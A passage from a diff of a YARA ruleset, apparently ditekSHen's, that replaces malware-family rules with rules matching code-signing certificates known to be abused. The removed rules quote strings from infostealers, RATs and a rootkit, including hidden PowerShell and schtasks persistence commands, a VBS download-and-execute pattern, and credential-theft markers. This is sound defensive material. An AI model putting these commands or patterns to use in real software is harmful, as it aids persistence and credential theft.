+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5020-L5031"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "47d343def76a323c66db4ba6fb1c0d119f45323f9b7f36695e4aeb7b070819d7"
+		logic_hash = "e2890f8c623ce15d8a3f996e87be4b73a8cd9f96386ce8d356d7e0fad0342dd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Venom RAT + HVNC" fullword ascii
-		$x2 = "Venom" fullword ascii
-		$x3 = "VenomByVenom" fullword wide
-		$s1 = "/c schtasks /create /f /sc onlogon /rl highest /tn \"" fullword wide
-		$s2 = "UmVjZWl2ZWQ" wide
-		$s3 = "Pac_ket" fullword wide
-		$s4 = "Po_ng" fullword wide
+		thumbprint = "a657b8f2efea32e6a1d46894764b7a4f82ad0b56"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BBT KLA d.o.o." and pe.signatures [ i ] . serial == "31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" )
 }
-rule DITEKSHEN_MALWARE_Win_Sapphirestealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_510C5E540503F30C9Caa3082296Aa452 : FILE
 {
 	meta:
-		description = "Detects SapphireStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ed6cffe4-23f1-5791-b07d-75abb698c899"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "eddbe6f1-fb7c-5129-afb4-6b4d67e39f60"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11172-L11190"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5033-L5045"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "97088c0decf158d45a02571bd50b5f370c139339c19b8071f38c0f9816232d1f"
+		hash = "cb01f31a322572035cf19f6cda00bcf1d8235dcc692588810405d0fc6e8d239c"
+		logic_hash = "9b6ad8b3e90fcd63f86b353e89ce7e6226197bfcb491e2151b8dbf580466076e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Sapphire.Modules." ascii
-		$s2 = "sapphire\\" wide
-		$s3 = "by r3vengerx0" wide
-		$s4 = "Sapphire\\obj\\" ascii
-		$s5 = "[ERROR_GETSECRETKEY_METHOD]" fullword wide
-		$s6 = "[ERROR_CANT_GET_PASSWORD]" fullword wide
-		$s7 = "<h2>------NEW LOGS------</h2>" wide
-		$s8 = "[ERROR] can't create grab directory" wide
-		$s9 = "<UploadToTelegram>d__" ascii
-		$s10 = "UploadToTelegram" ascii
-		$s11 = ".SendLog+<UploadToTelegram>d__" ascii
+		thumbprint = "3e56a13ceb87243b8b2c5de67da54a3a9e0988d7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Systems Analysis 360 Ltd" and pe.signatures [ i ] . serial == "51:0c:5e:54:05:03:f3:0c:9c:aa:30:82:29:6a:a4:52" )
 }
 
-rule DITEKSHEN_MALWARE_Win_R77 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_56Bba7Fe242E6B49695Bcf07870F5F5E : FILE
 {
 	meta:
-		description = "Detects r77 rootkit"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "813d207e-c6d9-5fea-8387-19da33bc3317"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "902c1949-81e6-5070-ac60-2ebbb363fc6d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11192-L11217"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5047-L5058"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3ec6e88a3a77b7dc69eb51a528e6417f6b8695c7cb01d699cf248cebd9b84e2"
+		logic_hash = "6c9da28b90bcff069509fc8e91c0a960805bb8339d0fa21f5466c38b6d20f95f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "startup" fullword wide
-		$s2 = "process_names" fullword wide
-		$s3 = "paths" fullword wide
-		$s4 = "service_names" fullword wide
-		$s5 = "tcp_local" fullword wide
-		$s6 = "tcp_remote" fullword wide
-		$s7 = "\\\\.\\pipe\\" wide
-		$s8 = "SOFTWARE\\" wide
+		thumbprint = "3c176bff246a30460311e8c71f880cad2a845164"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 5 of them and pe.exports ( "ReflectiveDllMain" ) ) or ( 5 of them and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".detourd" ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ewGMiQgCHj" and pe.signatures [ i ] . serial == "56:bb:a7:fe:24:2e:6b:49:69:5b:cf:07:87:0f:5f:5e" )
 }
-rule DITEKSHEN_MALWARE_Win_Disco_Nightclub : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Dfef1A8C0Dbfef64Bc6C8A0647D6E873 : FILE
 {
 	meta:
-		description = "Hunts for Disco NightClub"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "79cbd351-e5d9-5f1f-8e73-71e0acca2707"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a8e2a271-399f-531a-8e69-27a1598ba086"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11219-L11237"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5060-L5071"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee0bd110ea1a3182284c4b3d6dd7eff48ca809a35a925147c716b18a88c0a233"
+		logic_hash = "104f066ddfd34edc328844d06a84a1663b0d271c02599825c1797704e582883a"
 		score = 75
-		quality = 51
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\OfficeBroker\\OfficeBroker.exe" ascii wide nocase
-		$s2 = "\\EDGEUPDATE\\EDGEAOUT" ascii wide nocase
-		$s3 = "\\EDGEUPDATE\\update" ascii wide nocase
-		$s4 = "windows.system.update.com" ascii wide nocase
-		$s5 = "edgeupdate-security-windows.com" ascii wide nocase
-		$s6 = "nightclub::" ascii wide nocase
-		$s7 = "EncryptedPasswordFlt" ascii wide nocase
-		$s8 = "Microsoft\\def\\Gfr45.cfg" ascii wide nocase
-		$s9 = "::keylog::" ascii wide nocase
-		$pdb1 = "\\AbcdMainProject\\Rootsrc\\Projects\\MainS\\Ink\\" ascii wide nocase
-		$pdb2 = "\\Autogen\\Kh\\AutogenAlg\\" ascii wide nocase
+		thumbprint = "0709cdcb27230171877e2a11e6646a9fde28e02c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NnTqRHlSFNJSUHGaiKWzqyHGdPzBarblmWEzpKHvkZrqn" and pe.signatures [ i ] . serial == "00:df:ef:1a:8c:0d:bf:ef:64:bc:6c:8a:06:47:d6:e8:73" )
 }
-rule DITEKSHEN_MALWARE_Win_Risepro : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0609B5Aad2Dfb81Fbe6B75E4Cfe372A6 : FILE
 {
 	meta:
-		description = "Detects RisePro infostealer"
-		author = "ditekShen"
-		id = "77bc8791-cbe8-53b5-86f4-bc918454a6a6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "db7bf2e3-f514-5133-a35a-87c43a5f12cf"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11239-L11269"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5073-L5084"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6f1832f316df51ca108a3c75034bd53c3823cd3d9b16da120e12e252dbf90ff"
+		logic_hash = "2f483d06fd7af8db8e79203dcd4252d74f4859c0681e0bfcc4a97b351cb758a9"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "t.me/riseprosupport" ascii wide nocase
-		$s1 = "failed readpacket" fullword wide
-		$s2 = "faield sendpacket" fullword wide
-		$s3 = "PersistWal" fullword wide
-		$s4 = /CRED_ENUMERATE_(ALL|SESSION)_CREDENTIALS/ fullword ascii
-		$s5 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" fullword wide
-		$s6 = { 4c 00 6f 00 67 00 69 00 6e 00 20 00 44 00 61 00
-                74 00 61 [10] 57 00 65 00 62 00 20 00 44 00 61 00
-                74 00 61 [2] 48 00 69 00 73 00 74 00 6f 00 72 00
-                79 [21] 43 00 6f 00 6f 00 6b 00 69 00 65 00 73 }
-		$s7 = { 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00
-                69 00 6f 00 6e 00 2f 00 78 00 2d 00 77 00 77 00
-                77 00 2d 00 66 00 6f 00 72 00 6d 00 2d 00 75 00
-                72 00 6c 00 65 00 6e 00 63 00 6f 00 64 00 65 00
-                64 00 3b 00 20 00 63 00 68 00 61 00 72 00 73 00
-                65 00 74 00 3d 00 75 00 74 00 66 00 2d 00 38 00
-                42 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74
-                00 69 00 6f 00 6e 00 2f 00 6a 00 73 00 6f 00 6e
-                00 2c 00 20 00 74 00 65 00 78 00 74 00 2f 00 70
-                00 6c 00 61 00 69 00 6e 00 2c 00 20 00 2a 00 2f
-                00 2a }
-		$s8 = /_(SET|GET)_(GRABBER|LOADER)/ wide
-		$s9 = /catch (save )?(windows cred|screen|pluginscrypto|historyCC|autofill|cookies|passwords|passwords sql|autofills sql|dwnlhistory sql|discordToken|quantum|isDropped)/ fullword wide
+		thumbprint = "a30013d7a055c98c4bfa097fe85110629ef13e67"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "vVBhgeghjdigSdWYSAdmy" and pe.signatures [ i ] . serial == "06:09:b5:aa:d2:df:b8:1f:be:6b:75:e4:cf:e3:72:a6" )
 }
-rule DITEKSHEN_MALWARE_Win_Graphicalproton_Rsockstun : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02B6656292310B84022Db5541Bc48Faf : FILE
 {
 	meta:
-		description = "Detects GraphicalProton custom rsockstun"
-		author = "ditekShen"
-		id = "5efa85f6-7e73-53a1-92df-4cb975e62345"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "252c8339-73d3-5de0-8f75-78a6a2da4abc"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11271-L11286"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5086-L5097"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca4d18160b89d82106310237cf81bba57a7f51be77a31d2f18ca8c2987972c2c"
+		logic_hash = "374f7abfab6f7def8b895dc9536ca6bb7a605e9478934af6c97e8b7595fbee19"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$m1 = "main.connectviaproxy" ascii
-		$m2 = "main.connectForSocks" ascii
-		$m3 = "main.listenForClients" ascii
-		$m4 = "main.listenForSocks" ascii
-		$s1 = "Proxy-Authorization: NTLM TlRMTVNTUAABAAAABoIIAAAAAAAAAAAAAAAAAAAAAAA=" ascii
-		$s2 = "Server: nginx/1.14.1" ascii
-		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" ascii
-		$s4 = "wine_get" ascii
+		thumbprint = "bb58a3d322fd67122804b2924ad1ddc27016e11a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $m* ) and 2 of ( $s* ) ) or ( all of ( $s* ) and 1 of ( $m* ) ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DILA d.o.o." and pe.signatures [ i ] . serial == "02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" )
 }
 
-rule DITEKSHEN_MALWARE_Win_PWSHDLLDL : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00D609B6C95428954A999A8A99D4F198Af : FILE
 {
 	meta:
-		description = "Detects downloader"
-		author = "ditekShen"
-		id = "553ed216-c8c2-504f-b689-0e8d21a00eaa"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "e1b732d2-24fd-5819-a26a-049a9a569089"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11288-L11303"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5099-L5110"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7acef81f0e6e282650c161963599dcbe2b3975d482eb7c330581901b0fe85655"
+		logic_hash = "62eecc7cf240b9de6e04a43413bbeb84b673e9d3f1c4d67ec4082c099c6a87db"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file " fullword wide nocase
-		$s2 = "objShell.run \"powershell -WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase
-		$s3 = "cmd.exe /c schtasks.exe /create /tn \"" fullword wide nocase
-		$s4 = "-WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase
-		$s6 = "\" /tr \"wscript.exe //b //nologo '" fullword wide nocase
-		$s7 = "\" -Value \"Powershell.exe -WindowStyle hidden \"\"& '" fullword wide nocase
-		$op0 = { 61 01 00 34 53 79 73 74 65 6d 2e 57 65 62 2e 53 }
-		$op1 = { 4b 04 00 00 34 01 00 00 7f 05 00 00 1a }
+		thumbprint = "b1d8033dd7ad9e82674299faed410817e42c4c40"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fudl" and pe.signatures [ i ] . serial == "00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Nppspy : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6A568F85De2061F67Ded98707D4988Df : FILE
 {
 	meta:
-		description = "Detects NPPSpy / Ntospy"
-		author = "ditekShen"
-		id = "3867ba96-1162-5693-b58e-fc6fa04d880a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "ed8748ce-cd90-527b-a58e-da9c7164ed18"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11305-L11325"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5112-L5123"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "53e929b52dddd5e3d060d2dd9937411f1ff215be4d3c67f5935c2a3fbab006d6"
+		logic_hash = "f1aea9f6237cfbda49fea6d38ece935f9d4cc5abc678590c63b9a339aa37e104"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ntskrnl.dll" fullword ascii
-		$s2 = "PasswordStealing.dll" fullword ascii
-		$s3 = "ntoskrnl.dll" fullword ascii
-		$s4 = "\\programdata\\packag~" ascii
-		$s5 = "NPPSPY.dll" fullword ascii
-		$s6 = "MSControll.dll" fullword ascii
-		$s7 = "\\Windows\\Temp\\" ascii
-		$s8 = "\\NPPSpy\\" ascii
-		$s9 = "NPGetCaps" fullword ascii
-		$s10 = "NPLogonNotify" fullword ascii
-		$path = "\\GrzegorzTworek\\" ascii
+		thumbprint = "ed7e16a65294086fbdeee09c562b0722fdb2db48"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( pe.is_dll ( ) and filesize < 110KB and pe.number_of_exports == 2 and ( ( pe.exports ( "NPGetCaps" ) and pe.exports ( "NPLogonNotify" ) ) or ( 1 of ( $s* ) and ( pe.exports ( "NPGetCaps" ) or pe.exports ( "NPLogonNotify" ) ) ) ) ) or ( ( $path ) and any of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Apladis" and pe.signatures [ i ] . serial == "6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" )
 }
-rule DITEKSHEN_MALWARE_Win_Agentracoon : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F90E68Cbf92Fd7Ad409E281C3F2A0F0A : FILE
 {
 	meta:
-		description = "Detects AgentRacoon. Not Raccoon"
-		author = "ditekShen"
-		id = "cc31bd71-da96-5a3d-b2f1-40f9745d8d46"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "e92daa7b-2d8a-5806-840e-678a9aa24fef"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11327-L11343"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5125-L5137"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7ed17a1bc161855f2bdc432952086f3b86b58ae9ea6c0d541544f4b63a8e08e8"
+		hash = "d79a8f491c0112c3f26572350336fe7d22674f5550f37894643eba980ae5bd32"
+		logic_hash = "ca8d80a446df0c28e9fb4944bd69d9fa008be968c449e5a469b182fbf8744a3f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "UdpClient" fullword ascii
-		$s2 = "IPEndPoint" fullword ascii
-		$s3 = "get_Client" fullword ascii
-		$s4 = "set_ReceiveTimeout" fullword ascii
-		$s5 = "Command failed:" wide
-		$s6 = "uploaded" wide
-		$s7 = "downloaded" wide
-		$s8 = ".telemetry." wide
-		$s9 = "xn--" wide
+		thumbprint = "c202564339ddd78a1ce629ce54824ba2697fa3d6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SUCK-MY-DICK-ESET" and pe.signatures [ i ] . serial == "f9:0e:68:cb:f9:2f:d7:ad:40:9e:28:1c:3f:2a:0f:0a" )
 }
-rule DITEKSHEN_MALWARE_Win_Simda : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7Ddd3796A427B42F2E52D7C7Af0Ca54F : FILE
 {
 	meta:
-		description = "Detects Simda / Shifu infostealer"
-		author = "ditekShen"
-		id = "892a5ffe-ea1a-5df3-9c36-0198fa61b8b6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "2619669f-cceb-5177-9738-d28236e1344e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11345-L11361"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5139-L5150"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3f06e86033e8f9534f9904a2a63c4717a9532eb235f6f4405ef1db7d9b93f036"
+		logic_hash = "15df43212a842936e2ea0d834797f11fe80af3d376a19aa9a806aa6ed793e679"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "command=auth_loginByPassword&back_command=&back_custom1=&" fullword ascii
-		$s2 = "iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clma" ascii
-		$s3 = "debug_%s_%s.log" fullword ascii
-		$s4 = "Content-Disposition: form-data; name=\"file\"; filename=\"report\"" ascii
-		$s5 = "name=%s&port=%u" ascii
-		$s6 = "id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d" ascii
-		$s7 = "{BotVer:" fullword ascii
-		$s8 = "software\\microsoft\\windows nt\\currentversion\\winlogon" ascii
-		$s9 = /(!|&|data_)inject(=ok)?/ fullword ascii
+		thumbprint = "b5cd5a485dee4a82f34c98b3f108579e8501fdea"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fobos" and pe.signatures [ i ] . serial == "7d:dd:37:96:a4:27:b4:2f:2e:52:d7:c7:af:0c:a5:4f" )
 }
-rule DITEKSHEN_MALWARE_Win_Vbsdownloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_17D99Cc2F5B29522D422332E681F3E18 : FILE
 {
 	meta:
-		description = "Detects second stage VBS downloader of third stage VBS"
-		author = "ditekShen"
-		id = "480e6872-3a8c-58c5-a455-02342ec7918c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "98493d50-2bee-50a5-93f3-851559c494a6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11363-L11375"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5152-L5163"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fee9a78e60d02ff2f03035812af2bf36fe350c70d3e4e094713791833f8ba4d6"
+		logic_hash = "95116d1114239795707b310afea3122d274dac471546de1e0147992d1f3a1d4f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "CreateObject(\"MSXML2.ServerXMLHTTP\")" wide
-		$s2 = ".Open \"GET\"," wide
-		$s3 = ".Send" wide
-		$s4 = ".responseText" wide
-		$s5 = "ExecuteGlobal" wide
+		thumbprint = "969932039e8bf3b4c71d9a55119071cfa1c4a41b"
+		importance = 20
 
 	condition:
-		filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PKV Trading ApS" and pe.signatures [ i ] . serial == "17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" )
 }
-rule DITEKSHEN_MALWARE_Win_Umbralstealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02De1Cc6C487954592F1Bf574Ca2B000 : FILE
 {
 	meta:
-		description = "Detects Umbral infostealer"
-		author = "ditekShen"
-		id = "695a350b-3d8e-5244-a275-a60202a8e956"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "1dc1b576-34f4-5017-8340-c6f58692a31c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11377-L11398"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5165-L5176"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1686e4626e4d6335f028d6cb6471c32dac747a77fc95d97b4c9dfd043ba975e9"
+		logic_hash = "5963377fee755a859bc4330a1094ea1c8b2b588133706a22f67c1fb85542e64f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Umbral Stealer" wide
-		$x2 = "Umbral.payload." ascii
-		$s1 = "U2V0LU1wUHJlZmVyZW5jZ" wide
-		$s2 = "{{ Key = {0}, Value = {1} }}" wide
-		$s3 = "csproduct get uuid" wide
-		$s4 = "0.0.0.0 www."
-		$s5 = /(set|get)_Take(Screen|WebcamSnap)shot/ fullword ascii
-		$s6 = "still_pin" fullword ascii
-		$c1 = "kaspersky.com" wide
-		$c2 = "bitdefender.com" wide
-		$c3 = "virustotal.com" wide
-		$c4 = "malwarebytes.com" wide
-		$c5 = "clamav.net" wide
-		$c6 = "trendmicro.com" wide
+		thumbprint = "e35804bbf4573f492c51a7ad7a14557816fe961f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 4 of ( $c* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orca System" and pe.signatures [ i ] . serial == "02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" )
 }
-rule DITEKSHEN_MALWARE_Win_Metastealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_142Aac4217E22B525C8587589773Ba9B : FILE
 {
 	meta:
-		description = "Detects MetaStealer infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "46aa30c1-12c2-56df-8c65-0b96147f9051"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "86ef1337-71cc-5231-a31c-8d8a8d95873f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11400-L11423"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5178-L5188"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
